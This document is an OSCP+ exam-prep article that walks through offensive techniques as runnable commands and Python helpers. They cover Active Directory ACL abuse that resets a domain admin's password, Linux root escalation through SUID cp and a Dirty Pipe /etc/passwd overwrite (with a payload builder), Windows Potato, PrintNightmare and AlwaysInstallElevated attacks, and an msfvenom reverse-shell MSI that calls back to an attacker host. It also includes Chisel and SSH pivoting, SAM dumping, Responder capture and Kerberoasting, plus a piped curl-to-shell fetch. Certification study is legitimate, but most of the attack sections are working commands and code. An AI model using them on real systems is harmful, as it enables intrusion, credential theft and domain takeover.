OSCP+ Domination: 12 Must-Know Attack Vectors & Privilege Escalation Techniques (With Commands) + Video

Introduction:

The OSCP+ certification demands hands‑on mastery of real‑world penetration testing, from initial enumeration to domain compromise. This article extracts technical content from a high‑intensity CTF training program, delivering actionable commands, tool configurations, and exploitation workflows that mirror exam scenarios. Whether you’re pivoting through networks or abusing Active Directory, these step‑by‑step guides will sharpen your offensive security skills.

Learning Objectives:

  • Execute multi‑stage Linux and Windows privilege escalation using kernel exploits, misconfigurations, and service abuses.
  • Perform Active Directory enumeration and lateral movement with BloodHound, PowerView, and Impacket.
  • Build and deploy tunneling & pivoting techniques (SSH, Chisel, Meterpreter) to breach segmented networks.

You Should Know:

1. Active Directory Enumeration – BloodHound & SharpHound

This section extracts core enumeration from the training’s “Active Directory Attacks” module. BloodHound maps AD attack paths via graph theory. You will collect data, analyze shortest paths to Domain Admins, and execute targeted abuse.

Step‑by‑step guide (Linux attacker, Windows target):

  • Install BloodHound and Neo4j (Kali/Debian):
    sudo apt install neo4j bloodhound
    sudo systemctl start neo4j
    Browse to http://localhost:7474, log in with the default neo4j:neo4j and set a new password; the BloodHound GUI then connects to bolt://localhost:7687 with those credentials.

  • Run SharpHound on a Windows host you control (via Cobalt Strike beacon, RDP, or any shell):
    .\SharpHound.exe -c All --domain domain.local --zipfilename loot.zip

  • Alternatively, use BloodHound.py from Linux (no binary on the target, only valid domain credentials and a route to the DC):
    bloodhound-python -d domain.local -u lowpriv -p 'password' -ns 192.168.1.10 -c all --zip
    
  • Import the resulting `.zip` or `.json` files into BloodHound GUI.
  • Query for high‑value edges: “Find Shortest Paths to Domain Admins” or “List all Kerberoastable users”.
  • Abuse example – if your user (or a group it belongs to) has `GenericAll` over a domain admin account, you can reset that account's password directly. `Add-DomainObjectAcl` is only needed when you hold `WriteDacl`/`WriteOwner` instead and must first grant yourself the right:
    On Windows with PowerView (skip this step if you already have GenericAll)
    Add-DomainObjectAcl -TargetIdentity "DomainAdminUser" -PrincipalIdentity "our_user" -Rights All
    Then reset the password
    $NewPassword = ConvertTo-SecureString 'Hacked123!' -AsPlainText -Force
    Set-DomainUserPassword -Identity "DomainAdminUser" -AccountPassword $NewPassword
    The same reset from Linux with Samba's net, no agent on the target
    net rpc password "DomainAdminUser" 'Hacked123!' -U 'domain.local/our_user%password' -S dc.domain.local
    A password reset locks the real admin out and stands out in the logs; it is fine for the exam, but on a real engagement prefer a quieter abuse of the same right, such as targeted Kerberoasting (set an SPN on the account, request the ticket, crack it offline).


What this does: maps group membership, ACLs, local admin rights, domain trusts and where privileged users have sessions, so you can plan lateral movement and privilege escalation before touching another host. Collection itself is not quiet, though: SharpHound queries LDAP heavily and contacts every computer over SMB for session and local‑group data, which defenders can spot.
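The "shortest path to Domain Admins" query is plain breadth‑first search over the collected edges. The script below is an added example (not the training's material and not BloodHound code): it runs that search over a small constructed graph, with assumed names such as LOWPRIV@DOMAIN.LOCAL and HELPDESK@DOMAIN.LOCAL, and prints which abuse each edge on the winning path calls for, condensed from the PowerView steps above.

```python
"""Shortest attack path over a BloodHound-style graph (added example, not BloodHound's code)."""
from collections import deque

# Constructed toy graph, NOT real SharpHound output: (source, edge type, target).
# Names follow BloodHound's UPPERCASE "NAME@DOMAIN" convention; all are assumptions.
SAMPLE_EDGES = [
    ("LOWPRIV@DOMAIN.LOCAL", "MemberOf", "HELPDESK@DOMAIN.LOCAL"),
    ("LOWPRIV@DOMAIN.LOCAL", "CanRDP", "WS01.DOMAIN.LOCAL"),            # dead end
    ("HELPDESK@DOMAIN.LOCAL", "GenericAll", "SVC_BACKUP@DOMAIN.LOCAL"),
    ("SVC_BACKUP@DOMAIN.LOCAL", "AdminTo", "FS01.DOMAIN.LOCAL"),
    ("FS01.DOMAIN.LOCAL", "HasSession", "DA_BOB@DOMAIN.LOCAL"),
    ("DA_BOB@DOMAIN.LOCAL", "MemberOf", "DOMAIN ADMINS@DOMAIN.LOCAL"),
    ("HELPDESK@DOMAIN.LOCAL", "WriteDacl", "IT_ADMINS@DOMAIN.LOCAL"),
    ("IT_ADMINS@DOMAIN.LOCAL", "MemberOf", "DOMAIN ADMINS@DOMAIN.LOCAL"),
]

# What each edge type on a path means operationally (condensed from the article's steps).
ABUSE_HINTS = {
    "MemberOf":   "inherited: the group's rights apply to you",
    "GenericAll": "Set-DomainUserPassword / net rpc password (Add-DomainGroupMember for groups)",
    "WriteDacl":  "Add-DomainObjectAcl -Rights All on the target, then use the granted right",
    "AdminTo":    "local admin on the host: dump SAM/LSASS there",
    "HasSession": "that user's credentials sit in LSASS on the host",
    "CanRDP":     "interactive logon only; not a privilege by itself",
}


def build_graph(edges):
    """Adjacency list: node -> [(edge type, neighbour), ...]."""
    adj = {}
    for src, edge, dst in edges:
        adj.setdefault(src, []).append((edge, dst))
    return adj


def shortest_path(edges, start, goal):
    """BFS over unweighted directed edges; returns [(src, edge, dst), ...] or None."""
    adj = build_graph(edges)
    parent = {start: None}          # node -> (previous node, edge used)
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for edge, nxt in adj.get(node, []):
            if nxt not in parent:    # first visit == shortest in hop count
                parent[nxt] = (node, edge)
                queue.append(nxt)
    if goal not in parent:
        return None
    path, node = [], goal
    while parent[node] is not None:
        prev, edge = parent[node]
        path.append((prev, edge, node))
        node = prev
    return path[::-1]


def describe(path):
    """One human-readable line per hop, with the abuse hint for the edge."""
    return [f"{s} -[{e}]-> {d}: {ABUSE_HINTS.get(e, '?')}" for s, e, d in path]


if __name__ == "__main__":
    p = shortest_path(SAMPLE_EDGES, "LOWPRIV@DOMAIN.LOCAL", "DOMAIN ADMINS@DOMAIN.LOCAL")
    print("\n".join(describe(p)))
```

On the sample graph the five‑hop route through the backup account loses to the three‑hop route LOWPRIV → HELPDESK (MemberOf) → IT_ADMINS (WriteDacl) → DOMAIN ADMINS (MemberOf): granting yourself AddMember on IT_ADMINS is enough. That is exactly the kind of short cut the GUI query surfaces and a manual review of group memberships misses.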

2. Linux Privilege Escalation – Automated & Manual

From the training’s “Linux Privilege Escalation” topic. Attackers start with low‑privilege shell; escalate via SUID binaries, cron jobs, and kernel exploits.

Step‑by‑step:

  • Run LinPEAS (Linux Privilege Escalation Awesome Script):
    curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
    (no Internet from the target? host the script on your own box with python3 -m http.server and fetch it from there)

  • Manually check SUID binaries:
    find / -perm -4000 -type f 2>/dev/null
    If /usr/bin/cp is SUID root, it copies as root, so you can overwrite /etc/passwd with a copy that contains a second UID‑0 user:
    cp /etc/passwd /tmp/passwd
    echo "root2:$(openssl passwd -1 -salt salt password123):0:0:root:/root:/bin/bash" >> /tmp/passwd
    cp /tmp/passwd /etc/passwd
    su root2   (password: password123)
    Check every SUID hit against GTFOBins; an SUID cp is only the simplest case.
    
  • Exploit misconfigured sudo:
    sudo -l  Look for (root) NOPASSWD: /usr/bin/vim
    sudo vim -c ':!/bin/sh'  Spawn root shell
    
  • Kernel exploit (e.g., Dirty Pipe – CVE‑2022‑0847, Linux 5.8 up to the 5.16.11/5.15.25/5.10.102 fixes; check uname -r first):
    wget https://raw.githubusercontent.com/Alu-Cannon/CVE-2022-0847/main/exploit.c
    gcc exploit.c -o dirtypipe
    cp /etc/passwd /tmp/passwd.bak
    ./dirtypipe /etc/passwd 1 "oot:$(openssl passwd -1 -salt salt password123):0:0:root:/root:/bin/bash"$'\n'
    su root   (password: password123; restore /etc/passwd from the backup afterwards)
    The PoC takes TARGETFILE OFFSET DATA and patches the page cache in place: it cannot write the first byte of a page, cannot cross a page boundary and cannot grow the file. That is why the write starts at offset 1 (the "r" of root stays where it is) and replaces root's own entry instead of appending a new user, and why the trailing newline must be a real newline rather than a literal backslash‑n. Whatever the longer line runs over in the next entry is corrupted, hence the backup.
    

Why it matters: privilege escalation is expected on practically every exam machine (a low‑privilege shell earns only the local.txt points), so automate the enumeration and know the manual fallbacks.
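Getting the Dirty Pipe write right by hand is fiddly: it starts at offset 1, cannot grow the file, and the new root line is longer than the original one. The script below is an added example (not the training's code and not part of the exploit) that builds the OFFSET and DATA arguments so the overwrite ends exactly on an existing line boundary, padding the GECOS field with spaces and reporting which following entries get sacrificed. The sample /etc/passwd is constructed, and the hash field is a stand‑in for the output of openssl passwd -1 -salt salt password123.

```python
"""Build an in-place /etc/passwd overwrite for a Dirty Pipe style PoC (added example)."""

PAGE = 4096  # the write must stay inside one page-cache page

# Stand-in for the output of `openssl passwd -1 -salt salt password123`:
# the 22-character MD5-crypt digest is replaced by X's, substitute the real value.
HASH_FIELD = "$1$salt$" + "X" * 22

# Constructed sample of a target's /etc/passwd (first four entries only).
SAMPLE_PASSWD = (
    b"root:x:0:0:root:/root:/bin/bash\n"
    b"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    b"bin:x:2:2:bin:/bin:/usr/sbin/nologin\n"
    b"sys:x:3:3:sys:/dev:/usr/sbin/nologin\n"
)


def dirty_pipe_payload(original: bytes, hash_field: str = HASH_FIELD):
    """Return (offset, data, dropped_entries) for a PoC taking TARGETFILE OFFSET DATA.

    Dirty Pipe cannot touch byte 0 of a page, cross a page boundary or grow the
    file, so the leading 'r' of "root" is kept, the write starts at offset 1 and
    ends exactly on an existing line boundary. The slack is absorbed by padding
    GECOS with spaces; the entries the longer root line runs over are returned so
    the operator sees the cost (restore them from the backup afterwards).
    """
    lines = original.splitlines(keepends=True)
    if not lines or not lines[0].startswith(b"root:"):
        raise ValueError("expected root to be the first entry")
    fields = [b"root", hash_field.encode(), b"0", b"0", b"root", b"/root", b"/bin/bash"]
    minimal = b":".join(fields) + b"\n"
    end = 0
    for k, line in enumerate(lines):          # find the first line end >= len(minimal)
        end += len(line)
        if end >= len(minimal):
            break
    else:
        raise ValueError("file too short for the new root entry")
    if end > PAGE:
        raise ValueError("root entry would cross the first page; Dirty Pipe cannot write across it")
    fields[4] += b" " * (end - len(minimal))   # pad GECOS to hit the boundary exactly
    data = b":".join(fields) + b"\n"
    return 1, data[1:], lines[1:k + 1]         # drop the 'r' already present at offset 0


def apply_overwrite(original: bytes, offset: int, data: bytes) -> bytes:
    """Simulate what the page cache looks like after the in-place write."""
    return original[:offset] + data + original[offset + len(data):]


def is_consistent(passwd: bytes) -> bool:
    """Every non-empty line must still have the seven colon-separated passwd fields."""
    return all(line.count(b":") == 6 for line in passwd.split(b"\n") if line)


if __name__ == "__main__":
    off, data, dropped = dirty_pipe_payload(SAMPLE_PASSWD)
    print(f"./dirtypipe /etc/passwd {off} {data.decode()!r}")
    print("entries sacrificed:", [d.split(b":")[0].decode() for d in dropped])
    print(apply_overwrite(SAMPLE_PASSWD, off, data).decode())
```

On the sample file the new root line swallows the daemon entry (the first boundary past the 61‑byte minimal line is the end of line two), everything from bin onward is untouched, and the file keeps its length, which is the constraint the exploit cannot violate.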

3. Windows Privilege Escalation – Potato Style & Print Spooler

Extracted from “Windows Privilege Escalation” section. Attackers abuse SeImpersonate privileges, unquoted service paths, and print spooler vulnerabilities.

Step‑by‑step:

  • Enumerate with WinPEAS:
    .\winPEASx64.exe quiet cmd > output.txt
    
  • SeImpersonatePrivilege → JuicyPotatoNG (Windows 10/11, Server 2019/2022; use PrintSpoofer or the classic JuicyPotato on older builds):
    JuicyPotatoNG.exe -t * -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\temp\imp.txt" -l 1337
    PrintSpoofer64.exe -i -c cmd   (interactive SYSTEM shell, needs the Spooler service running)

  • PrintNightmare (CVE‑2021‑1675 / CVE‑2021‑34527) – add a local admin by loading a DLL through the Print Spooler (only on hosts that missed the mid‑2021 patches and still run the Spooler service):
    Using SharpPrintNightmare
    .\SharpPrintNightmare.exe C:\path\to\malicious.dll
    The DLL runs as SYSTEM, so build it to create the user and add it to Administrators.

  • Unquoted service path:
    wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\"
    A path like C:\Program Files\Vuln Service\service.exe is exploitable only if you can write to one of the locations Windows searches first: C:\ (for C:\Program.exe) or C:\Program Files\ (for C:\Program Files\Vuln.exe). Check with icacls, drop the payload under the matching name, then restart the service (sc stop / sc start, or reboot if it starts automatically and you cannot restart it).

  • AlwaysInstallElevated MSI (both keys must be 1):
    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    If both are set to 1, generate a malicious MSI:
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4444 -f msi -o rev.msi
    msiexec /quiet /qn /i rev.msi
    

Tip: Run `whoami /priv` immediately. SeImpersonate, SeAssignPrimaryToken, or SeBackupPrivilege are gold.
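Deciding where the payload for an unquoted service path has to go is a small algorithm: for every space in the unquoted part of the path, Windows tries the prefix up to that space with .exe appended before it reaches the real binary. The script below is an added example (not from the training and not a tool the article names) that derives those candidate paths and the directory you would test with icacls, from a constructed list of services standing in for the wmic output above.

```python
"""Hijack candidates for unquoted service paths (added example)."""
import re

# Constructed sample standing in for `wmic service get name,pathname,startmode`
# output: (service name, PathName, StartMode). All names are assumptions.
SAMPLE_SERVICES = [
    ("VulnSvc", r"C:\Program Files\Vuln Service\service.exe", "Auto"),
    ("GoodSvc", r'"C:\Program Files\Good Service\good.exe" -k svc', "Auto"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
    ("OldSvc", r"C:\Program Files\Old Tools\old.exe --debug", "Manual"),
]

# The executable part of an unquoted PathName ends at the first ".exe" that is
# followed by whitespace or the end of the string; anything after it is arguments.
EXE_RE = re.compile(r"^(.*?\.exe)(\s|$)", re.IGNORECASE)


def hijack_candidates(pathname: str):
    """Paths CreateProcess tries before the real binary, in the order it tries them.

    Returns [] for quoted paths, paths under C:\\Windows (filtered like the wmic
    one-liner does) and paths without spaces, none of which are exploitable this way.
    """
    if pathname.startswith('"') or pathname.lower().startswith("c:\\windows"):
        return []
    m = EXE_RE.match(pathname)
    if not m:
        return []
    words = m.group(1).split(" ")
    # "C:\A B\C D\e.exe" -> C:\A.exe, then C:\A B\C.exe; the last word is the real file.
    return [" ".join(words[:i]) + ".exe" for i in range(1, len(words))]


def triage(services):
    """(service, candidate path, directory to check with icacls) for auto-start services."""
    findings = []
    for name, pathname, startmode in services:
        if startmode.lower() != "auto":      # manual services need a restart right anyway
            continue
        for cand in hijack_candidates(pathname):
            directory = cand.rsplit("\\", 1)[0] + "\\"
            findings.append((name, cand, directory))
    return findings


if __name__ == "__main__":
    for name, cand, directory in triage(SAMPLE_SERVICES):
        print(f"{name}: drop payload as {cand}")
        print(f'    icacls "{directory}"      (look for (W), (M) or (F) for your user/group)')
        print(f"    sc stop {name} & sc start {name}")
```

Only VulnSvc survives triage: GoodSvc is quoted, Spooler lives under C:\Windows, and OldSvc is manual‑start. Writing to C:\ normally needs admin, so in practice the second candidate, a writable C:\Program Files\Vuln.exe, is the one worth checking.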

4. Tunneling & Pivoting – Chisel and SSH Dynamic Forwarding

Based on the “Tunneling & Pivoting Techniques” module. Once you compromise a jump host, pivot into internal networks.

Step‑by‑step:

  • SSH local port forwarding (attacker port 8080 → internal-web:80 as seen from the jump host):
    ssh -L 8080:internal-web:80 user@jumphost

  • SSH dynamic SOCKS5 proxy:
    ssh -D 9050 user@jumphost
    Then add to /etc/proxychains4.conf: socks5 127.0.0.1 9050
    proxychains nmap -sT -Pn -n --top-ports 100 10.0.20.0/24
    A SOCKS proxy only relays complete TCP connections, so SYN scans, ICMP pings and UDP do not work through it: always use -sT -Pn, and keep the port list short because every probe is a separate proxied connection.

  • Chisel – fast HTTP tunneling (static binary from GitHub; use the same version on both ends):
    On attacker (server mode)
    chisel server -p 8000 --reverse
    On compromised jump host (client)
    chisel client attacker_ip:8000 R:socks
    This opens a SOCKS5 listener on the attacker at 127.0.0.1:1080; point proxychains at it (socks5 127.0.0.1 1080).

  • Meterpreter pivoting (after getting a shell):
    run autoroute -s 10.0.0.0/16
    background
    use auxiliary/scanner/portscan/tcp
    set RHOSTS 10.0.20.5
    run
    To use non‑Metasploit tools through the route, start auxiliary/server/socks_proxy (SRVPORT 1080, VERSION 5) and point proxychains at it.
    

Real‑world utility: Pivoting is non‑negotiable for internal network breaches. OSCP+ often places a public facing server as a gateway.
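What proxychains, ssh -D and chisel R:socks all have in common is the SOCKS5 CONNECT exchange, and seeing it explains why nmap must run with -sT -Pn through them. The script below is an added example, not code from the training or from any of those tools: it builds both sides of the exchange, parses the proxy's reply, and includes a small connect helper you can use in your own scripts. The replies are constructed; the proxy address 127.0.0.1:9050 and the targets 10.0.20.5 and internal-web are assumptions.

```python
"""SOCKS5 CONNECT exchange as ssh -D / chisel R:socks speak it (added example)."""
import ipaddress
import socket
import struct

VER, NO_AUTH, CMD_CONNECT = 0x05, 0x00, 0x01
ATYP_IPV4, ATYP_DOMAIN = 0x01, 0x03
REPLY_TEXT = {0: "succeeded", 1: "general failure", 2: "not allowed by ruleset",
              3: "network unreachable", 4: "host unreachable", 5: "connection refused",
              6: "TTL expired", 7: "command not supported", 8: "address type not supported"}


def greeting() -> bytes:
    """Client hello: version 5, one auth method offered (no authentication)."""
    return bytes([VER, 1, NO_AUTH])


def connect_request(host: str, port: int) -> bytes:
    """CONNECT host:port; IPv4 literals go as ATYP 1, names as ATYP 3 (the proxy resolves them)."""
    try:
        body, atyp = ipaddress.IPv4Address(host).packed, ATYP_IPV4
    except ipaddress.AddressValueError:
        name = host.encode()
        body, atyp = bytes([len(name)]) + name, ATYP_DOMAIN
    return bytes([VER, CMD_CONNECT, 0x00, atyp]) + body + struct.pack("!H", port)


def parse_reply(data: bytes):
    """Return (ok, reason, (bound_addr, bound_port)) from the proxy's reply."""
    if len(data) < 4 or data[0] != VER:
        raise ValueError("not a SOCKS5 reply")
    rep, atyp = data[1], data[3]
    if atyp == ATYP_IPV4:
        bound = (str(ipaddress.IPv4Address(data[4:8])), struct.unpack("!H", data[8:10])[0])
    elif atyp == ATYP_DOMAIN:
        n = data[4]
        bound = (data[5:5 + n].decode(), struct.unpack("!H", data[5 + n:7 + n])[0])
    else:
        bound = (None, None)
    return rep == 0, REPLY_TEXT.get(rep, f"unknown ({rep})"), bound


def socks5_connect(proxy: tuple, host: str, port: int, timeout: float = 5.0) -> socket.socket:
    """Open a TCP connection to host:port through a SOCKS5 proxy such as ('127.0.0.1', 9050)."""
    s = socket.create_connection(proxy, timeout=timeout)
    s.sendall(greeting())
    if s.recv(2) != bytes([VER, NO_AUTH]):
        s.close()
        raise ConnectionError("proxy refused the no-auth method")
    s.sendall(connect_request(host, port))
    ok, reason, _ = parse_reply(s.recv(262))     # 262 = longest possible reply (domain form)
    if not ok:
        s.close()
        raise ConnectionError(f"proxy could not connect: {reason}")
    return s                                     # from here on: a plain TCP stream to host:port


# Constructed replies in the shape a SOCKS5 proxy sends them (bound address 0.0.0.0:0).
OPEN_PORT_REPLY = bytes([VER, 0x00, 0x00, ATYP_IPV4]) + b"\x00\x00\x00\x00" + b"\x00\x00"
CLOSED_PORT_REPLY = bytes([VER, 0x05, 0x00, ATYP_IPV4]) + b"\x00\x00\x00\x00" + b"\x00\x00"

if __name__ == "__main__":
    print("client ->", greeting().hex(), connect_request("10.0.20.5", 80).hex())
    print("open port  <-", parse_reply(OPEN_PORT_REPLY))
    print("closed port <-", parse_reply(CLOSED_PORT_REPLY))
```

The only thing the proxy can do for you is a full TCP connect on your behalf, and a closed port comes back as reply code 5; there is no way to send a raw SYN or an ICMP echo through it, which is what -sS and host discovery need. That is also why scanning a /24 over SOCKS is slow: each port probe is its own handshake with the proxy.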

5. Password Attacks – Hash Extraction & Cracking

From the “Password Attacks & Credential Exploitation” section. Extract hashes from Windows (SAM, LSASS, NTDS) and Linux (/etc/shadow), then crack offline.

Step‑by‑step:

  • Windows – dump SAM using reg.exe (needs an elevated shell, i.e. after local privilege escalation):
    reg save hklm\sam sam.save
    reg save hklm\system system.save
    Transfer to attacker, then impacket-secretsdump
    impacket-secretsdump -sam sam.save -system system.save LOCAL
    The NT hashes crack with hashcat -m 1000 and also work as‑is for pass‑the‑hash (impacket-psexec -hashes :NTHASH ...).

  • Linux – extract and crack (reading /etc/shadow already needs root; the point is reusing the cracked passwords on other hosts and services):
    unshadow /etc/passwd /etc/shadow > combined.txt
    john --wordlist=/usr/share/wordlists/rockyou.txt combined.txt
    For hashcat, feed it the hash field only: $6$ is sha512crypt (-m 1800), $5$ sha256crypt (-m 7400), $1$ md5crypt (-m 500); yescrypt ($y$, the default on recent Debian and Ubuntu) has no hashcat mode, so use john for it:
    grep '\$6\$' /etc/shadow | cut -d: -f2 > sha512.txt
    hashcat -m 1800 -a 0 sha512.txt /usr/share/wordlists/rockyou.txt

  • Capture NetNTLMv2 via Responder (on the attacker interface facing the target):
    sudo responder -I eth0 -wrf
    Nobody browses to your share during the exam, so trigger the authentication yourself: make a compromised host touch a UNC path on your box (e.g. dir \\10.10.14.10\x), or feed a UNC path to a web app upload or file‑include parameter. Captured hashes land in /usr/share/responder/logs/.
    hashcat -m 5600 captured_hash.txt rockyou.txt

  • Kerberoasting with impacket:
    impacket-GetUserSPNs -request -dc-ip 192.168.1.10 domain.local/lowpriv:password -outputfile kerb.txt
    hashcat -m 13100 kerb.txt rockyou.txt
    -m 13100 covers RC4 (etype 23) tickets; AES tickets need -m 19600 (etype 17) or -m 19700 (etype 18).

Pro tip: `--force` does not make hashcat faster. It only suppresses the checks that stop it from running (typically a missing or unsupported OpenCL driver inside a VM) and can cause missed cracks, so use it only when hashcat refuses to start, or fall back to `-D 1` (CPU only) or to john. Combine wordlists with rules (e.g. `-r /usr/share/hashcat/rules/best64.rule`) for passwords that follow a pattern rather than appearing verbatim in the list.

What Undercode Say:

  • Automation is the floor, not the ceiling. Tools like LinPEAS and BloodHound give you a head start, but manual verification (checking sudo -l, cron scripts, path injection) separates pass from fail.
  • Pivoting labs are under‑practiced. Many CTF players skip tunneling, yet exam networks always include multiple subnets. Master Chisel and SSH dynamic forwarding before test day.
  • The Active Directory set is worth 40 of the 100 exam points. If you cannot enumerate Kerberoastable accounts or abuse ACLs, you will not pass OSCP+.

Prediction:

By Q4 2026, certification exams like OSCP+ will inject more cloud‑native attack paths (misconfigured Azure AD, AWS IAM privilege escalation). Training programs will shift from pure on‑prem AD to hybrid pivoting, and automated detection engines (EDRs) will force attackers to learn advanced evasion. The practice CTF format described here will evolve into “Purple Team” labs where candidates both attack and write defensive reports. Sign up now to stay ahead of the curve.


Reported By: Oscp Exam – Hackers Feeds